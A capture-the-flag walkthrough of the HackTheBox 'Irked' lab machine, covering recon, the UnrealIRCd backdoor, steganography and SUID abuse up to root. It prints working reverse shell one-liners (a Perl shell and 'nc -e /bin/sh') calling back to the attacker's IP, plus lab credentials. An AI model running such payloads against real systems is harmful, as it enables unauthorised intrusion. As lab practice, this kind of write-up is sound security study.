HacktheBox.eu - Irked - Update

HacktheBox.eu - Irked - Update

Recon

Let's use threader3000 for our recon scan. It's a threaded scanner written in python that does a super quick up/down scan on all TCP ports, then suggests a nmap scan based on the results. It will automatically save the nmap scan results as XML, then we can convert it to HTML

xsltproc ./irked.htb/irked.htb.xml -o ./irked.html

We've got a goodly amount of ports open to us on this box

22,80,111,6697,8067,55015,65534

We can see 22 is OpenSSH 6.7p1

80 is Apache 2.4.10

111 & 55015 both say RPC

And the others say UnreallRCd…. Whatever that is, Lets start on port 80 and see what it shows us.

An angry face with "IRC is almost working!"

If we run dirb we will find some default apache pages but not much else to go on

What is that UnreallRCD?

https://www.unrealircd.org/

Oh it's an IRC server… that makes sense.

If we google UnrealRCD and exploit, there appears to be a backdoor in some versions although we don't know what specific version this is, it seems like a pretty easy exploit to test.

Exploit

https://metalkey.github.io/unrealircd-3281-backdoor-command-execution.html

So we just need to type "AB" and we can get code execution?

Ok. Let's follow along the blog but with a perl reverse tcp shell instead.

Let's start by generation our perl Reverse shell

msfvenom  -p cmd/unix/reverse_perl LHOST=10.10.14.13 LPORT=5555

Which give us this output.

perl -MIO -e '$p=fork;exit,if($p);foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(PeerAddr,"10.10.14.13:5555");STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~ /(.*)/){system $1;}};'

So now we just need to stick AB; in front of it.

AB;perl -MIO -e '$p=fork;exit,if($p);foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(PeerAddr,"10.10.14.13:5555");STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~ /(.*)/){system $1;}};'

Let's set up our netcat listener in case it it works

nc -lnvp 5555

And If we pick any of the irc ports and netcat to them we are met with this just like in the blog

Paste in our backdoor.

And we caught our reverse shell.

But the shell is kinda bad let's see if we have python installed and upgrade this shell

python -c 'import pty; pty.spawn("/bin/bash")'

Better

If we poke around in some folder we eventually come to the /home/djmarov/Documents/

Folder in here is a file named .backup and a user.txt file we don't yet have access to.

If we read the contents of .backup we see this.

Super elite steg backup pw UPupDOWNdownLRlrBAbaSSss

Two things here …. That looks like the konami code ( not really important), but this also says this is a password for something hidden inside a file with steganography.

The only file we have seen so far is that irked face on the default webpage.

Let's save a copy of it to our kali box.

I named mine irked.txt 

If we use steghide to try to extract anything hidden the command would be

steghide extract -sf ./index.jpeg

And it looks like there was something there.

Let's check it out

Cat pass.txt Kab6h+m+bbp2J:HG

Ok so it seems like this is a password for something and considering we found the key in the djmardov folder We could guess that it is their password. 

Let's try to ssh as djmardov now

ssh djmardov@irked.htb

And now we can read the user.txt from /home/djmardov/Documents/user.txt

Now we need to figure out a path to root

Let's use updog and wget to copy over linpeas to irked to see if we can find a path forward.

On kali we start updog just by typing'

updog

And it will server anything that is in the folder that it was started from default is port 9090

Let's make a new folder on irked to download this into

mkdir /tmp/circusmonkey

wget http://10.10.14.13:9090/linpeas.sh

Then we need to give it execution rights

chmod +x ./linpeas.sh

And we see this interesting SUID that is normally not on boxes..

/usr/bin/viewuser

What does that do?

Looks like its  trying to read something from /tmp/listusers…

But that file doesn't exist….

So let's make it 

echo "whoami" > /tmp/listusers chmod 777 /tmp/listusers

And then run /usr/bin/viewusers

Cool looks like we have the results of whoami here…. Which means we can put anything we want in that temp folder and it should run it as root.

So let's get a shell as root

Let's start by setting up another listener on our kalibox

nc -lncp 5566

Then on irked we will send our nc connection command to the listusers file

echo "nc 10.10.14.13 5566 -e /bin/sh" > /tmp/listusers

Now if we run /usr/bin/viewuser again hopefully we catch a shell as root.

/usr/bin/viewuser

And there we go, we are root, and now we can get the root flag.